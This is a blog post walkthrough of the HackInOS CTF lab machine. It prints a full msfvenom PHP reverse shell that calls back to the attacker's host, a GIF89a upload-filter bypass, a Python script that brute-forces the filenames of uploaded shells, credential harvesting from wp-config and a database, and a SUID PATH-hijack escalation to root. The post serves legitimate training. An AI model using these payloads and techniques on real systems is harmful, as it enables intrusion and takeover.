<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="DescriptionHackinOS is a beginner level CTF style vulnerable machine. I created this VM for my university’s cybersecurity community and all cyber security enthusiasts. I thank Mehmet Oguz Tozkopara">
<meta name="keywords" content="vulnhub,ctf,walkthrough">
<meta property="og:type" content="article">
<meta property="og:title" content="HackInOs Walkthrough">
<meta property="og:url" content="https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/index.html">
<meta property="og:site_name" content="InfoSec Adventures">
<meta property="og:description" content="DescriptionHackinOS is a beginner level CTF style vulnerable machine. I created this VM for my university’s cybersecurity community and all cyber security enthusiasts. I thank Mehmet Oguz Tozkopara">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/hackinos.png">
<meta property="og:image" content="https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/comment.png">
<meta property="og:image" content="https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/upload_request.png">
<meta property="og:updated_time" content="2019-05-20T14:16:46.473Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HackInOs Walkthrough">
<meta name="twitter:description" content="DescriptionHackinOS is a beginner level CTF style vulnerable machine. I created this VM for my university’s cybersecurity community and all cyber security enthusiasts. I thank Mehmet Oguz Tozkopara">
<meta name="twitter:image" content="https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/hackinos.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    

    <title>HackInOs Walkthrough</title>

    <link rel="stylesheet" href="/css/style.css">
    
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    
    
    
      <link rel="alternate" href="/atom.xml" title="InfoSec Adventures" type="application/atom+xml">
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2019/05/11/Introduction-to-Frida/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&text=HackInOs Walkthrough"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&title=HackInOs Walkthrough"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackInOs Walkthrough&body=Check out this article: https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&title=HackInOs Walkthrough"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Description"><span class="toc-number">1.</span> <span class="toc-text">Description</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Port-scanning"><span class="toc-number">1.1.</span> <span class="toc-text">Port scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Uploading-images"><span class="toc-number">1.2.</span> <span class="toc-text">Uploading images</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Creating-a-reverse-shell"><span class="toc-number">1.3.</span> <span class="toc-text">Creating a reverse shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Writing-the-exploit"><span class="toc-number">1.4.</span> <span class="toc-text">Writing the exploit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">1.5.</span> <span class="toc-text">Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Escaping-the-container"><span class="toc-number">1.6.</span> <span class="toc-text">Escaping the container</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-shell"><span class="toc-number">1.7.</span> <span class="toc-text">Getting root shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Before-you-go"><span class="toc-number">1.8.</span> <span class="toc-text">Before you go</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackInOs Walkthrough
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">InfoSec Adventures</span>
      </span>
      
    <div class="postdate">
        <time datetime="2019-05-16T11:32:21.000Z" itemprop="datePublished">2019.05.16.</time>
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF-Walkthroughs/">CTF Walkthroughs</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/ctf/">ctf</a>, <a class="tag-link" href="/tags/vulnhub/">vulnhub</a>, <a class="tag-link" href="/tags/walkthrough/">walkthrough</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5bf72b3154516f79"></script>

<p><img src="hackinos.png" alt></p>
<h1 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h1><p>HackinOS is a beginner level CTF style vulnerable machine. I created this VM for my university’s cybersecurity community and all cyber security enthusiasts. I thank Mehmet Oguz Tozkoparan, Ömer Faruk Senyayla, and Tufan Gungor for their help during creating this lab.</p>
<h2 id="Port-scanning"><a href="#Port-scanning" class="headerlink" title="Port scanning"></a>Port scanning</h2><p>The nmap scan gave me the following output:</p>
<pre><code>root :: ~ » nmap -A -p- 192.168.43.96 -oN nmap_scan
Nmap scan report for vulnvm (192.168.43.96)
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog &amp;#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>We have 2 TCP port open to work with. I always start with the web server, but it’s a good practice to check the SSH if it is vulnerable.<br>It looks like that on port 8000, there is a web server running (probably Wordpress 5.0.3) and it has 2 disallowed entries in the <code>robots.txt</code> file. One of them is an upload directory, the other one is an upload script written in PHP. Let’s check these out!</p>
<h2 id="Uploading-images"><a href="#Uploading-images" class="headerlink" title="Uploading images"></a>Uploading images</h2><p>I was presented with a very basic upload site, where you can probably upload different kinds of images. After inspecting the source using the developer tools, I found a comment in the site’s source code. It was a <a href="https://github.com/fatihhcelik/Vulnerable-Machine---Hint" target="_blank" rel="noopener">Github repository link</a>, which contains the source of the upload script. As it turns out, this was a great help!</p>
<p><img src="comment.png" alt="Comment is hidden in the site&#39;s source code."></p>
<p>I copied the actual PHP code from the repository and pasted below.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// Check if image file is a actual image or fake image</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">"submit"</span>])) &#123;</span><br><span class="line">    $rand_number = rand(<span class="number">1</span>,<span class="number">100</span>);</span><br><span class="line">    $target_dir = <span class="string">"uploads/"</span>;</span><br><span class="line">    $target_file = $target_dir . md5(basename($_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>].$rand_number));</span><br><span class="line">    $file_name = $target_dir . basename($_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</span><br><span class="line">    $uploadOk = <span class="number">1</span>;</span><br><span class="line">    $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));</span><br><span class="line">    $type = $_FILES[<span class="string">"file"</span>][<span class="string">"type"</span>];</span><br><span class="line">    $check = getimagesize($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>($check[<span class="string">"mime"</span>] == <span class="string">"image/png"</span> || $check[<span class="string">"mime"</span>] == <span class="string">"image/gif"</span>)&#123;</span><br><span class="line">        $uploadOk = <span class="number">1</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $uploadOk = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">":)"</span>;</span><br><span class="line">    &#125; </span><br><span class="line">  <span class="keyword">if</span>($uploadOk == <span class="number">1</span>)&#123;</span><br><span class="line">      move_uploaded_file($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>], $target_file.<span class="string">"."</span>.$imageFileType);</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">"File uploaded /uploads/?"</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>Don’t be intimidated by the code, it’s actually very simple. First of all, it generates a number between 1 and 100. Then, the file name + this random number gets concatenated and the <code>md5()</code> function calculates the MD5 hash. Since, 1 - 100 is not a big range of numbers, we can easily brute-force this. So, if we were to upload a reverse shell, we have to write a small script which loops through those numbers and calculates the MD5 hash of the file name + current index. After that, the script checks whether the MIME type of the file is “image/png” or “image/gif” and if it is the upload will be successful.</p>
<h2 id="Creating-a-reverse-shell"><a href="#Creating-a-reverse-shell" class="headerlink" title="Creating a reverse shell"></a>Creating a reverse shell</h2><p>I quickly generated a PHP reverse shell with the help of <code>msfvenom</code> and named it “creatively” <code>shell.php</code>. I also added a <code>GIF89a;</code> file header above the reverse shell code to bypass upload restrictions. </p>
<pre><code>root :: ~/Downloads » sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.2 LPORT=9898 -f raw &gt; shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes

root :: ~/Downloads » ls
shell.php
root :: ~/Downloads » cat shell.php
/*&lt;?php /**/ error_reporting(0); $ip = &apos;192.168.43.2&apos;; $port = 9898; if (($f = &apos;stream_socket_client&apos;) &amp;&amp; is_callable($f)) { $s = $f(&quot;tcp://{$ip}:{$port}&quot;); $s_type = &apos;stream&apos;; } if (!$s &amp;&amp; ($f = &apos;fsockopen&apos;) &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = &apos;stream&apos;; } if (!$s &amp;&amp; ($f = &apos;socket_create&apos;) &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = &apos;socket&apos;; } if (!$s_type) { die(&apos;no socket funcs&apos;); } if (!$s) { die(&apos;no socket&apos;); } switch ($s_type) { case &apos;stream&apos;: $len = fread($s, 4); break; case &apos;socket&apos;: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(&quot;Nlen&quot;, $len); $len = $a[&apos;len&apos;]; $b = &apos;&apos;; while (strlen($b) &lt; $len) { switch ($s_type) { case &apos;stream&apos;: $b .= fread($s, $len-strlen($b)); break; case &apos;socket&apos;: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[&apos;msgsock&apos;] = $s; $GLOBALS[&apos;msgsock_type&apos;] = $s_type; if (extension_loaded(&apos;suhosin&apos;) &amp;&amp; ini_get(&apos;suhosin.executor.disable_eval&apos;)) { $suhosin_bypass=create_function(&apos;&apos;, $b); $suhosin_bypass(); } else { eval($b); } die();%
root :: ~/Downloads » nvim shell.php
root :: ~/Downloads » cat shell.php
GIF89a;
/*&lt;?php /**/ error_reporting(0); $ip = &apos;192.168.43.2&apos;; $port = 9898; if (($f = &apos;stream_socket_client&apos;) &amp;&amp; is_callable($f)) { $s = $f(&quot;tcp://{$ip}:{$port}&quot;); $s_type = &apos;stream&apos;; } if (!$s &amp;&amp; ($f = &apos;fsockopen&apos;) &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = &apos;stream&apos;; } if (!$s &amp;&amp; ($f = &apos;socket_create&apos;) &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = &apos;socket&apos;; } if (!$s_type) { die(&apos;no socket funcs&apos;); } if (!$s) { die(&apos;no socket&apos;); } switch ($s_type) { case &apos;stream&apos;: $len = fread($s, 4); break; case &apos;socket&apos;: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(&quot;Nlen&quot;, $len); $len = $a[&apos;len&apos;]; $b = &apos;&apos;; while (strlen($b) &lt; $len) { switch ($s_type) { case &apos;stream&apos;: $b .= fread($s, $len-strlen($b)); break; case &apos;socket&apos;: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[&apos;msgsock&apos;] = $s; $GLOBALS[&apos;msgsock_type&apos;] = $s_type; if (extension_loaded(&apos;suhosin&apos;) &amp;&amp; ini_get(&apos;suhosin.executor.disable_eval&apos;)) { $suhosin_bypass=create_function(&apos;&apos;, $b); $suhosin_bypass(); } else { eval($b); } die();
root :: ~/Downloads »
</code></pre><p>On the following picture, you can see the intercepted upload request in Burp Suite. At this point, we are able to upload arbitrary files, but we can’t really execute them. </p>
<p><img src="upload_request.png" alt="Intercepted upload request in Burp Suite."></p>
<h2 id="Writing-the-exploit"><a href="#Writing-the-exploit" class="headerlink" title="Writing the exploit"></a>Writing the exploit</h2><p>Now, let’s write a simple Python script. First, I stored the target and the file name in separate variables. Then, the loop goes from 1 to 100 and in its body, I created a new file name by appending the current index to the initial file name. We have to hash this string value with the MD5 algorithm. After that, the URL is almost ready, but we have to append the original extension (‘.php’) at the end. I’m waiting one second after each request just in case, but you can decrease this number (or simply comment it out) to make the process faster.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># replace with target IP address</span></span><br><span class="line">target = <span class="string">'http://192.168.43.96:8000/uploads/'</span></span><br><span class="line"><span class="comment"># replace with your file name</span></span><br><span class="line">file_name = <span class="string">'shell.php'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> index <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">100</span>):</span><br><span class="line">    new_file_name = file_name + str(index)</span><br><span class="line">    print(new_file_name)</span><br><span class="line">    md5hash = hashlib.md5(new_file_name.encode(<span class="string">'utf-8'</span>)).hexdigest()</span><br><span class="line">    print(<span class="string">'Trying hash: '</span> + md5hash)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        r = requests.head(target + md5hash + <span class="string">'.php'</span>)</span><br><span class="line">        time.sleep(<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">except</span> requests.ConnectionError:</span><br><span class="line">        print(<span class="string">'Failed to connect...'</span>)</span><br></pre></td></tr></table></figure>
<p>If we found the correct hash the script will “stop” and we should see that a meterpreter shell opened and got a connection back.</p>
<pre><code>msf5 &gt; use multi/handler
msf5 exploit(multi/handler) &gt; set payload php/meterpreter/reverse_tcp
payload =&gt; php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) &gt; set lhost 192.168.43.2
lhost =&gt; 192.168.43.2
msf5 exploit(multi/handler) &gt; set lport 9898
lport =&gt; 9898
msf5 exploit(multi/handler) &gt; exploit

[*] Started reverse TCP handler on 192.168.43.2:9898
[*] Sending stage (38247 bytes) to 192.168.43.96
[*] Meterpreter session 1 opened (192.168.43.2:9898 -&gt; 192.168.43.96:32900)

meterpreter &gt;
</code></pre><div class="addthis_tipjar_inline"></div>

<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><p>I usually switch to the netcat like shell with the <code>shell</code> command and explore the machine. In this case, python was installed and I could easily upgrade it to a pseudo TTY shell. Since there was a Wordpress installation I went on to see the <code>wp-config.php</code> file for juicy information. I found out that the database host is <code>db</code>, the database name is <code>wordpress</code> and the password is <code>wordpress</code> too. Here is how I connected to the database:</p>
<pre><code>python -c &quot;import pty;pty.spawn(&apos;/bin/bash&apos;)&quot;
www-data@1afdd1f6b82c:/var/www/html$ mysql -h db -u wordpress -p
mysql -h db -u wordpress -p
Enter password: wordpress

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 5.7.25 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type &apos;help;&apos; or &apos;\h&apos; for help. Type &apos;\c&apos; to clear the current input statement.

MySQL [(none)]&gt;
</code></pre><p>In the <code>wordpress</code> database, there was a particularly interesting table named <code>host_ssh_cred</code>. Previously, I ran the famous <code>LinEnum.sh</code> script, which identified that we are actually in a Docker container.</p>
<h2 id="Escaping-the-container"><a href="#Escaping-the-container" class="headerlink" title="Escaping the container"></a>Escaping the container</h2><p>I obviously printed out everything in that table. Be careful, because the <code>pw</code> column actually contains an MD5 hash, not the actual password. So, the real SSH username is <code>hummingbirdscyber</code> and after cracking the hash the real password is <code>123456</code>.</p>
<pre><code>MySQL [wordpress]&gt; select * from host_ssh_cred;
+-------------------+----------------------------------+
| id                | pw                               |
+-------------------+----------------------------------+
| hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e |
+-------------------+----------------------------------+
1 row in set (0.00 sec)

MySQL [wordpress]&gt;
</code></pre><p>After logging in with SSH, I explored the available directories and found a file called <code>a.out</code> in the Desktop folder.</p>
<pre><code>root :: ~ » ssh hummingbirdscyber@192.168.43.96
hummingbirdscyber@192.168.43.96&apos;s password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-29-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

349 packages can be updated.
248 updates are security updates.

New release &apos;18.04.2 LTS&apos; available.
Run &apos;do-release-upgrade&apos; to upgrade to it.

hummingbirdscyber@vulnvm:~$ ls
Desktop    Downloads  Pictures  Templates  examples.desktop
Documents  Music      Public    Videos
hummingbirdscyber@vulnvm:~$ cd Desktop/
hummingbirdscyber@vulnvm:~/Desktop$ ls -la
total 24
drwxr-xr-x  2 hummingbirdscyber hummingbirdscyber 4096 May 19 20:23 .
drwxr-xr-x 19 hummingbirdscyber hummingbirdscyber 4096 May 19 20:32 ..
-rwsr-xr-x  1 root              root              8720 Mar  1 23:25 a.out
hummingbirdscyber@vulnvm:~/Desktop$
</code></pre><h2 id="Getting-root-shell"><a href="#Getting-root-shell" class="headerlink" title="Getting root shell"></a>Getting root shell</h2><p>I knew this file is the key to root this box, so I started investigating. I ran the executable and it printed out <code>root</code>. The file also has SUID bit set, so what it means is that the file has root permissions. The next thing I did is to run the <code>strings</code> command on the file. This way, we can identify strings, commands, libraries used, etc.. in the executable. I spotted the <code>whoami</code> command, which is probably responsible for printing out the <code>root</code> text.</p>
<pre><code>hummingbirdscyber@vulnvm:~/Desktop$ strings a.out
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
setgid
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-H
AWAVA
AUATL
[]A\A]A^A_
whoami
;*3$&quot;
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609

--- snip ---
</code></pre><p>The author of the program didn’t use an absolute path, so it means that we can create our own <code>whoami</code> script and the program will execute it like we’re root. As you can see, I created a very simple bash script to spawn a root shell… After that, I added the <code>/home/hummingbirdscyber/Desktop/</code> path before the PATH environment variable to make sure our script gets called instead of the real one. Also, don’t forget to make the shell script executable!</p>
<pre><code>hummingbirdscyber@vulnvm:~/Desktop$ nano whoami
hummingbirdscyber@vulnvm:~/Desktop$ cat whoami
#!/bin/bash
echo &quot;Spawning root shell... Enjoy!&quot;
/bin/bash
hummingbirdscyber@vulnvm:~/Desktop$ export PATH=/home/hummingbirdscyber/Desktop/:$PATH
hummingbirdscyber@vulnvm:~/Desktop$ echo $PATH
/home/hummingbirdscyber/Desktop/:/home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
hummingbirdscyber@vulnvm:~/Desktop$ chmod +x whoami
hummingbirdscyber@vulnvm:~/Desktop$ ./a.out
Spawning root shell... Enjoy!
root@vulnvm:~/Desktop#
</code></pre><p>Finally, I printed out the root flag, which was a nice ASCII hummingbird.</p>
<pre><code>root@vulnvm:/root# cat flag
Congratulations!
                            -ys-
                                /mms.
                                +NMd+`
                            `/so/hMMNy-
                                `+mMMMMMMd/           ./oso/-
                                `/yNMMMMMMMMNo`   .`   +-
                                .oyhMMMMMMMMMMN/.     o.
                                    `:+osysyhddhs`    `o`
                                    .:oyyhshMMMh.   .:
                                `-//:. `:sshdh: `
                                            -so:.
                                            .yy.
                                        :odh
                                        +o--d`
                                    /+. .d`
                                    -/`  `y`
                                `:`   `/
                                `.     `
root@vulnvm:/root#
</code></pre><h2 id="Before-you-go"><a href="#Before-you-go" class="headerlink" title="Before you go"></a>Before you go</h2><p>If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!</p>
<p><br><div align="center" class="addthis_inline_share_toolbox"></div><br></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Description"><span class="toc-number">1.</span> <span class="toc-text">Description</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Port-scanning"><span class="toc-number">1.1.</span> <span class="toc-text">Port scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Uploading-images"><span class="toc-number">1.2.</span> <span class="toc-text">Uploading images</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Creating-a-reverse-shell"><span class="toc-number">1.3.</span> <span class="toc-text">Creating a reverse shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Writing-the-exploit"><span class="toc-number">1.4.</span> <span class="toc-text">Writing the exploit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">1.5.</span> <span class="toc-text">Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Escaping-the-container"><span class="toc-number">1.6.</span> <span class="toc-text">Escaping the container</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-shell"><span class="toc-number">1.7.</span> <span class="toc-text">Getting root shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Before-you-go"><span class="toc-number">1.8.</span> <span class="toc-text">Before you go</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&text=HackInOs Walkthrough"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&title=HackInOs Walkthrough"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackInOs Walkthrough&body=Check out this article: https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://infosecadventures.com/2019/05/16/HackInOs-Walkthrough/&title=HackInOs Walkthrough"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <!--<a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>-->
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Kristof Toth
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

